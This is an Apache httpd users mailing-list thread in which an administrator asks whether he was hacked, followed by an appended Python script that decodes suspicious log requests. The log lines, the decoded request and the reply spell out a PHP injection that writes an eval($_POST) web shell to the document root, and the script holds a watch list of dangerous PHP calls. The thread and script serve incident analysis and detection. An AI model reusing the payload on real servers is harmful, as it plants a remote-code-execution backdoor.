The first line is trying to create the file webconfig.txt.php in your DOCUMENT_ROOT directory, with the contents of the file being:
<?php eval($_POST[1]);?>

I didn't decode the remaining lines. I think they're just trying to do the same thing.

----- Original Message -----
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern
Subject: Re: [users@httpd] am i hacked ?

----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
>
> just in the moment I found two very weird entries in my access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
>
> What upsets me is that these two requests have status code 200, which means it was successful.
> The IP is from Ukraine. Where can I find out what these % characters mean? Does anyone understand what happened here? It's Apache 2.2.3 64bit.
>
> Thanks for any hint.
>
> Bernd
>

What I found out already: https://url-encoder.de/ helped me to decode the URL:

/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

Currently I don't understand what this means. I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packets to the network which include this IP.

Thankful for any tip.

Bernd

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Chair of the Supervisory Board: MinDir'in Baerbel Brumme-Bothe
Managing Directors: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Register court: Amtsgericht Muenchen HRB 6466
VAT ID: DE 129521671

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org
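
Added example, not part of the original messages: a Python script that does the decoding discussed in the thread offline, for every request in an access log. It URL-decodes the request, decodes any base64_decode() literal, and reports the file the request tries to write. The sample log is constructed from the request quoted above with documentation client addresses; the function names and the list of flagged PHP calls are assumptions of this example.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample in the log format quoted in the thread: the request from
# the thread with a documentation client address, plus one ordinary request.
SAMPLE_LOG = (
    '203.0.113.7 - - [06/Feb/2017:16:43:26 +0100] 236 "GET '
    '/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B'
    '%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3B'
    'file_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2C'
    'base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B'
    ' HTTP/1.1" 200 90\n'
    '203.0.113.9 - - [06/Feb/2017:16:45:01 +0100] 120 "GET /index.html HTTP/1.1" 200 5120\n'
)

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) ')
B64_CALL_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
WRITE_RE = re.compile(r"file_put_contents\(.*?['\"]([^'\"]+\.php)['\"]")
# Assumed watch list of PHP calls that have no business in a request URL.
PHP_CALL_RE = re.compile(r"\b(eval|assert|system|passthru|file_put_contents|base64_decode)\s*\(")


def analyze_line(line):
    """Return a finding dict if the request URL carries PHP code, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    decoded = unquote(target)  # %40 -> @, %28 -> (, %27 -> ', %2B -> +
    calls = set(PHP_CALL_RE.findall(decoded))
    if not calls:
        return None
    payloads = []
    for blob in B64_CALL_RE.findall(decoded):
        try:
            payloads.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            payloads.append("<invalid base64>")
    for payload in payloads:  # the inner layer can hide further calls
        calls.update(PHP_CALL_RE.findall(payload))
    written = WRITE_RE.search(decoded)
    return {"client": client, "status": int(status), "php_calls": sorted(calls),
            "dropped_file": written.group(1) if written else None,
            "embedded_payloads": payloads, "decoded": decoded}


def analyze_log(text):
    return [f for f in map(analyze_line, text.splitlines()) if f]
```

Any `dropped_file` it reports is the name to look for under DOCUMENT_ROOT, which is the check Bernd describes doing by hand.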